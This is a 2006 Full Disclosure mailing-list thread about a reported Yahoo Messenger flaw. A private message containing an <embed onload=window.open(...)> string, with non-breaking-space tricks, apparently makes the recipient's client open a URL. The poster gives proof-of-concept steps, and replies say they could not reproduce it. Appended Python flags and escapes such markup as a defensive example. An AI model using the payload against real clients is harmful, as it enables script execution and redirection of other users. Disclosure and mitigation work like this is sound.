Full Disclosure mailing list archives
Re: Yahoo messenger serious bug
From: evilrabbi <evilrabbi () gmail com>
Date: Fri, 28 Jul 2006 11:22:06 -0500
Didn't work for me either.

On 7/28/06, John Dietz <www.whitewolf () gmail com> wrote:

I just tried this in Messenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160, and the most I could get it to do was a Yahoo Search on the string.

Other side sees:

s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg<?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(

Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg <?#@@*-%29?@+%23@;?%28msg>: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.

There must be some other setting on either Messenger or the computer itself for this to work as you say. Possibly a setting for Messenger to use your default browser for searches instead of the PM window?

Cheers

On 7/28/06, Ivan Ivan <ivancool2003 () yahoo com ar> wrote:
>
> Hi,
> I found another vulnerability in yahoo messenger: if you receive a Private message with this string
>
> "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
>
> (without quotes), Yahoo messenger opens, in this case, google.com in the Internet Explorer of the remote victim.
>
> Yahoo messenger bug proof of concept:
>
> 1. Open messenger and log in.
>
> 2. Open a third-party yahoo chat client like yahelite through the Ymsgr protocol and log in with another account.
>
> 3. Send a PM to the messenger account with this string:
>
> s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> 4. The remote user will open www.google.com (you can change it).
>
> Note: in "helomsg :" this space must be created with alt+0160, and in "s: " with a normal space:
>
> s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> Tested in yahoo messenger 7.0/7.5
>
> Regards.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
There is intelligence in having all the answers, but wisdom lies in knowing which of the questions to answer.
--
h0 h0 h0
www.nopsled.net
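The thread describes a messaging client that renders a received message as HTML, so an embedded element carrying an onload handler runs in the recipient's client, and notes that the payload depends on an Alt+0160 (non-breaking space) character after "helomsg". As an added, defender-side example that is not code from the thread, from Yahoo, or from any of the posters, the Python below shows what a message-handling layer can do with such input: flag tags that are active-content elements or carry inline event handlers, normalise the non-breaking space so a plain-text keyword check is not bypassed by the lookalike character, and escape the markup so the client displays the text instead of parsing it. The function names and the reassembled sample message are my own constructions; only the payload fragments come from the thread.

```python
import html
import re

# Alt+0160 types a non-breaking space (U+00A0); the thread's PoC insists
# on it after "helomsg", so the constructed sample uses it explicitly.
NBSP = "\u00a0"

# Opaque filler and the markup fragment, copied from the thread.
FILLER = r":+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
EMBED_TAG = r"<embed onload=window.open('http:\\\\google.com/')>"

# Constructed sample message: the thread's payload reassembled on one line.
POC_MESSAGE = (
    "s: helomsg" + NBSP + FILLER + "msg:" + "-" * 45 + EMBED_TAG
    + "helomsg" + NBSP + FILLER + "msg:" + "-" * 45 + EMBED_TAG
    + "helomsg" + NBSP + FILLER
)

# Elements that load or execute active content when rendered as HTML.
ACTIVE_ELEMENTS = {"embed", "object", "script", "iframe", "applet"}

# Any tag: captures the element name and the raw attribute text.
TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][\w:-]*)([^>]*)>")
# Inline event-handler attributes such as onload= or onclick=.
EVENT_ATTR_RE = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)


def normalize_spaces(text: str) -> str:
    """Map non-breaking spaces to ordinary spaces so a keyword filter that
    looks for a plain 'helomsg :' is not bypassed by the lookalike character."""
    return text.replace(NBSP, " ")


def find_active_markup(text: str) -> list:
    """Return (element, reason) for every tag in the message that would
    execute script if the receiving client rendered the text as HTML."""
    findings = []
    for match in TAG_RE.finditer(text):
        element = match.group(1).lower()
        attributes = match.group(2)
        if element in ACTIVE_ELEMENTS:
            findings.append((element, "active-content element"))
        elif EVENT_ATTR_RE.search(attributes):
            findings.append((element, "event-handler attribute"))
    return findings


def neutralize(text: str) -> str:
    """Escape '<', '>' and '&' (after whitespace normalisation) so the
    message is displayed as literal text rather than parsed as markup."""
    return html.escape(normalize_spaces(text), quote=False)


if __name__ == "__main__":
    for element, reason in find_active_markup(POC_MESSAGE):
        print(f"blocked <{element}>: {reason}")
    print(neutralize(POC_MESSAGE))
```

Escaping on receipt is the mitigation that does not depend on keeping a blocklist current; the tag scan is there for logging and alerting, since a client that has to render HTML at all should still know when a message carried active content.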